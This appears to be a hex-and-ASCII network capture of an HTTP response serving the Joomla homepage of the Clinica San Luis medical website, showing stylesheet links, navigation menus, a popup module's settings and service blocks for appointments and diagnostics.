                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2894INData Raw: 37 63 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: 7c4e<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2894INData Raw: 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f
                                                                                                                                                                                                                                                                                        Data Ascii: okbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/engines/
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2896INData Raw: 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f
                                                                                                                                                                                                                                                                                        Data Ascii: 989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2897INData Raw: 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20
                                                                                                                                                                                                                                                                                        Data Ascii: min.js"></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2898INData Raw: 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20
                                                                                                                                                                                                                                                                                        Data Ascii: ng" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2900INData Raw: 6e 75 70 61 72 65 6e 74 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65
                                                                                                                                                                                                                                                                                        Data Ascii: nuparent><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content"><span class="g-me
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2901INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d
                                                                                                                                                                                                                                                                                        Data Ascii: menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent> <span class="g-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2902INData Raw: 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69
                                                                                                                                                                                                                                                                                        Data Ascii: ><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clini
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2904INData Raw: 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63
                                                                                                                                                                                                                                                                                        Data Ascii: -clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li c
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2905INData Raw: 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63
                                                                                                                                                                                                                                                                                        Data Ascii: -item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donac
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2906INData Raw: 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c
                                                                                                                                                                                                                                                                                        Data Ascii: /span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span><
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2908INData Raw: 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e
                                                                                                                                                                                                                                                                                        Data Ascii: os</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span>
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2909INData Raw: 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d
                                                                                                                                                                                                                                                                                        Data Ascii: omponent g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2910INData Raw: 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35
                                                                                                                                                                                                                                                                                        Data Ascii: ><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2912INData Raw: 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67
                                                                                                                                                                                                                                                                                        Data Ascii: closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="g
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2913INData Raw: 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72
                                                                                                                                                                                                                                                                                        Data Ascii: ){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" tar
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2914INData Raw: 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 69 74 61
                                                                                                                                                                                                                                                                                        Data Ascii: d g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-button"><a href="/index.php/contacto/cita
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2916INData Raw: 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 33 20 67 2d 61
                                                                                                                                                                                                                                                                                        Data Ascii: ng" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-3 g-a
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2917INData Raw: 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63
                                                                                                                                                                                                                                                                                        Data Ascii: <div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-bloc
